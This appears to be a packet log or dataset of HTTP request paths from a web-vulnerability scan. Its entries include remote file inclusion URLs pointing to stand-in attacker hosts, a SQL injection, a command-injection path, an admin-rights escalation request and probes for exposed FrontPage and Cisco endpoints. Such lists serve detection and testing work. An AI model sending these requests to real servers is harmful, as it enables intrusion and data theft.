Packet [1]	/CVS/Entries
Packet [2]	/library/lib.php?root=http://attacker.org
Packet [6]	/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/
Packet [12]	/iissamples/exair/search/advsearch.asp
Packet [23]	/_vti_pvt/doctodep.btr
Packet [27]	/ttforum/index.php?action=news%3Bboard=1%3Btemplate=http://www.yourserver.com/modules/forum/helpadmin%3Bext=help
Packet [30]	/php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=regularuser&new_password=regularpass&new_rights=admin&user=regularuser&pass=regularpass
Packet [39]	/officescan/cgi/jdkRqNotify.exe?domain=ugr.es&event=12
Packet [40]	/cgi-bin/webplus.exe?about
Packet [41]	/cfdocs/expeval/ExprCalc.cfm?RequestTimeout=2000&OpenFilePath=C:%5CInetpub%5Cwwwroot%5Ccfdocs%5Cexpeval%5C.%5Cdummy.txt
Packet [44]	/scripts/autoexec.bat%22%2B%22&%2Bdir%2Bc:/%2B.exe
Packet [45]	/_vti_pvt/access.cnf
Packet [49]	/iissamples/exair/howitworks/codebrws.asp
Packet [51]	/_vti_pvt/services.cnf
Packet [54]	/b2-tools/gm-2-b2.php?b2inc=http://xxxxxxxx
Packet [55]	/cgi-temp/uploader.exe
Packet [56]	/cgi-bin/webplus.cgi?Script=/webplus/webping/webping.wml
Packet [57]	/level/40/exec//show
Packet [60]	/cgi-bin/admin/login/index.php
Packet [62]	/level/19/exec/-
Packet [63]	/forum/index.php?act=Search&nav=lv&CODE=show&searchid=&search_in=topics&result_type=topics&hl=&st=20%27%20OR%20%27unusual%27%20=%20%27unusual%27/%2A
Packet [77]	/iissamples/exair/howitworks/Codebrw1.asp
Packet [79]	/level/30/exec/-
